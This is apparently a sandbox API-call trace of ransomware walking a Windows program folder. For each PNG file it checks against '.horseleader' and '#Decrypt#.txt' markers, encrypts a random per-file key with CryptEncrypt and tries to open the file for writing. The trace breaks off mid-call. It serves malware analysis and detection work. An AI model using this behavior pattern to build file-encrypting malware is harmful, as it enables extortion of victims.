[0251.695] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.695] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.695] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-next-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.695] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x722b1847, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x722b1847, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6905b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb4b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_btn-over-DOT.png", cAlternateFileName="")) returned 1 [0251.695] lstrcmpiW (lpString1="Pets_btn-over-DOT.png", lpString2="Windows") returned -1 [0251.695] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png") returned 74 [0251.695] StrStrIW (lpFirst="Pets_btn-over-DOT.png", lpSrch=".horseleader") returned 0x0 [0251.695] lstrcmpW (lpString1="Pets_btn-over-DOT.png", lpString2="#Decrypt#.txt") returned 1 [0251.695] lstrcmpW (lpString1="Pets_btn-over-DOT.png", lpString2="_uninstalling_.png") returned 1 [0251.695] lstrlenW (lpString=".testttjffg") returned 11 [0251.695] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png", lpSrch=".testttjffg") returned 0x0 [0251.695] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.695] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.695] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-over-dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.696] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x724a0a00, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x724a0a00, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6b6717, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbc8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_btn-previous-over-select.png", cAlternateFileName="")) returned 1 [0251.696] lstrcmpiW (lpString1="Pets_btn-previous-over-select.png", lpString2="Windows") returned -1 [0251.696] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png") returned 86 [0251.696] StrStrIW (lpFirst="Pets_btn-previous-over-select.png", lpSrch=".horseleader") returned 0x0 [0251.696] lstrcmpW (lpString1="Pets_btn-previous-over-select.png", lpString2="#Decrypt#.txt") returned 1 [0251.696] lstrcmpW (lpString1="Pets_btn-previous-over-select.png", lpString2="_uninstalling_.png") returned 1 [0251.697] lstrlenW (lpString=".testttjffg") returned 11 [0251.697] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png", lpSrch=".testttjffg") returned 0x0 [0251.697] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.697] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.697] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-previous-over-select.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.697] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x724a0a00, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x724a0a00, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6b6717, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x7e3, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_btn-previous-static.png", cAlternateFileName="")) returned 1 [0251.697] lstrcmpiW (lpString1="Pets_btn-previous-static.png", lpString2="Windows") returned -1 [0251.697] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png") returned 81 [0251.697] StrStrIW (lpFirst="Pets_btn-previous-static.png", lpSrch=".horseleader") returned 0x0 [0251.697] lstrcmpW (lpString1="Pets_btn-previous-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.697] lstrcmpW (lpString1="Pets_btn-previous-static.png", lpString2="_uninstalling_.png") returned 1 [0251.697] lstrlenW (lpString=".testttjffg") returned 11 [0251.697] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png", lpSrch=".testttjffg") returned 0x0 [0251.697] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.697] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.698] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-previous-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.698] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x722d79a4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x722d79a4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6b6717, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x33b7, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_frame-border.png", cAlternateFileName="")) returned 1 [0251.698] lstrcmpiW (lpString1="Pets_frame-border.png", lpString2="Windows") returned -1 [0251.698] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png") returned 74 [0251.698] StrStrIW (lpFirst="Pets_frame-border.png", lpSrch=".horseleader") returned 0x0 [0251.698] lstrcmpW (lpString1="Pets_frame-border.png", lpString2="#Decrypt#.txt") returned 1 [0251.698] lstrcmpW (lpString1="Pets_frame-border.png", lpString2="_uninstalling_.png") returned 1 [0251.698] lstrlenW (lpString=".testttjffg") returned 11 [0251.698] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png", lpSrch=".testttjffg") returned 0x0 [0251.698] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.698] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.698] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-border.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.698] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x724c6b5d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x724c6b5d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6dc875, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1681, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_frame-highlight.png", cAlternateFileName="")) returned 1 [0251.698] lstrcmpiW (lpString1="Pets_frame-highlight.png", lpString2="Windows") returned -1 [0251.698] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png") returned 77 [0251.699] StrStrIW (lpFirst="Pets_frame-highlight.png", lpSrch=".horseleader") returned 0x0 [0251.699] lstrcmpW (lpString1="Pets_frame-highlight.png", lpString2="#Decrypt#.txt") returned 1 [0251.699] lstrcmpW (lpString1="Pets_frame-highlight.png", lpString2="_uninstalling_.png") returned 1 [0251.699] lstrlenW (lpString=".testttjffg") returned 11 [0251.699] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png", lpSrch=".testttjffg") returned 0x0 [0251.699] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.699] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.699] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.699] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x722fdb01, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x722fdb01, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6dc875, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1fe9, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_frame-imageMask.png", cAlternateFileName="")) returned 1 [0251.699] lstrcmpiW (lpString1="Pets_frame-imageMask.png", lpString2="Windows") returned -1 [0251.699] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png") returned 77 [0251.699] StrStrIW (lpFirst="Pets_frame-imageMask.png", lpSrch=".horseleader") returned 0x0 [0251.699] lstrcmpW (lpString1="Pets_frame-imageMask.png", lpString2="#Decrypt#.txt") returned 1 [0251.699] lstrcmpW (lpString1="Pets_frame-imageMask.png", lpString2="_uninstalling_.png") returned 1 [0251.699] lstrlenW (lpString=".testttjffg") returned 11 [0251.699] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png", lpSrch=".testttjffg") returned 0x0 [0251.699] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.699] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.700] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-imagemask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.700] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x722d79a4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x722d79a4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ea22689, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x643e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_frame-shadow.png", cAlternateFileName="")) returned 1 [0251.700] lstrcmpiW (lpString1="Pets_frame-shadow.png", lpString2="Windows") returned -1 [0251.701] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png") returned 74 [0251.701] StrStrIW (lpFirst="Pets_frame-shadow.png", lpSrch=".horseleader") returned 0x0 [0251.701] lstrcmpW (lpString1="Pets_frame-shadow.png", lpString2="#Decrypt#.txt") returned 1 [0251.701] lstrcmpW (lpString1="Pets_frame-shadow.png", lpString2="_uninstalling_.png") returned 1 [0251.701] lstrlenW (lpString=".testttjffg") returned 11 [0251.701] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png", lpSrch=".testttjffg") returned 0x0 [0251.701] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.701] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.701] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-shadow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.701] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x724eccba, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x724eccba, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ea487e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_image-frame-backglow.png", cAlternateFileName="")) returned 1 [0251.701] lstrcmpiW (lpString1="Pets_image-frame-backglow.png", lpString2="Windows") returned -1 [0251.702] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png") returned 82 [0251.702] StrStrIW (lpFirst="Pets_image-frame-backglow.png", lpSrch=".horseleader") returned 0x0 [0251.702] lstrcmpW (lpString1="Pets_image-frame-backglow.png", lpString2="#Decrypt#.txt") returned 1 [0251.702] lstrcmpW (lpString1="Pets_image-frame-backglow.png", lpString2="_uninstalling_.png") returned 1 [0251.702] lstrlenW (lpString=".testttjffg") returned 11 [0251.702] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png", lpSrch=".testttjffg") returned 0x0 [0251.702] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.702] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.702] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-backglow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.702] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x724eccba, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x724eccba, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ea487e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1f0a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_image-frame-border.png", cAlternateFileName="")) returned 1 [0251.702] lstrcmpiW (lpString1="Pets_image-frame-border.png", lpString2="Windows") returned -1 [0251.702] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png") returned 80 [0251.702] StrStrIW (lpFirst="Pets_image-frame-border.png", lpSrch=".horseleader") returned 0x0 [0251.702] lstrcmpW (lpString1="Pets_image-frame-border.png", lpString2="#Decrypt#.txt") returned 1 [0251.702] lstrcmpW (lpString1="Pets_image-frame-border.png", lpString2="_uninstalling_.png") returned 1 [0251.702] lstrlenW (lpString=".testttjffg") returned 11 [0251.702] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png", lpSrch=".testttjffg") returned 0x0 [0251.702] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.702] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.703] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-border.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.703] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x724c6b5d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x724c6b5d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ea487e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1146, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_image-frame-ImageMask.png", cAlternateFileName="")) returned 1 [0251.703] lstrcmpiW (lpString1="Pets_image-frame-ImageMask.png", lpString2="Windows") returned -1 [0251.703] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png") returned 83 [0251.703] StrStrIW (lpFirst="Pets_image-frame-ImageMask.png", lpSrch=".horseleader") returned 0x0 [0251.703] lstrcmpW (lpString1="Pets_image-frame-ImageMask.png", lpString2="#Decrypt#.txt") returned 1 [0251.703] lstrcmpW (lpString1="Pets_image-frame-ImageMask.png", lpString2="_uninstalling_.png") returned 1 [0251.703] lstrlenW (lpString=".testttjffg") returned 11 [0251.703] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png", lpSrch=".testttjffg") returned 0x0 [0251.703] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.703] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.703] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-imagemask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.704] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7240848c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7240848c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ea487e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1ed0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_notes-txt-background.png", cAlternateFileName="")) returned 1 [0251.704] lstrcmpiW (lpString1="Pets_notes-txt-background.png", lpString2="Windows") returned -1 [0251.704] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png") returned 82 [0251.704] StrStrIW (lpFirst="Pets_notes-txt-background.png", lpSrch=".horseleader") returned 0x0 [0251.704] lstrcmpW (lpString1="Pets_notes-txt-background.png", lpString2="#Decrypt#.txt") returned 1 [0251.704] lstrcmpW (lpString1="Pets_notes-txt-background.png", lpString2="_uninstalling_.png") returned 1 [0251.704] lstrlenW (lpString=".testttjffg") returned 11 [0251.704] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png", lpSrch=".testttjffg") returned 0x0 [0251.704] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.704] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.705] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_notes-txt-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.705] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71fdde60, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71fdde60, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ea487e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x41ca, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="rollinghills.png", cAlternateFileName="")) returned 1 [0251.705] lstrcmpiW (lpString1="rollinghills.png", lpString2="Windows") returned -1 [0251.705] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png") returned 69 [0251.705] StrStrIW (lpFirst="rollinghills.png", lpSrch=".horseleader") returned 0x0 [0251.705] lstrcmpW (lpString1="rollinghills.png", lpString2="#Decrypt#.txt") returned 1 [0251.705] lstrcmpW (lpString1="rollinghills.png", lpString2="_uninstalling_.png") returned 1 [0251.705] lstrlenW (lpString=".testttjffg") returned 11 [0251.705] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png", lpSrch=".testttjffg") returned 0x0 [0251.705] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.705] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.705] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\rollinghills.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.705] FindNextFileW (in: 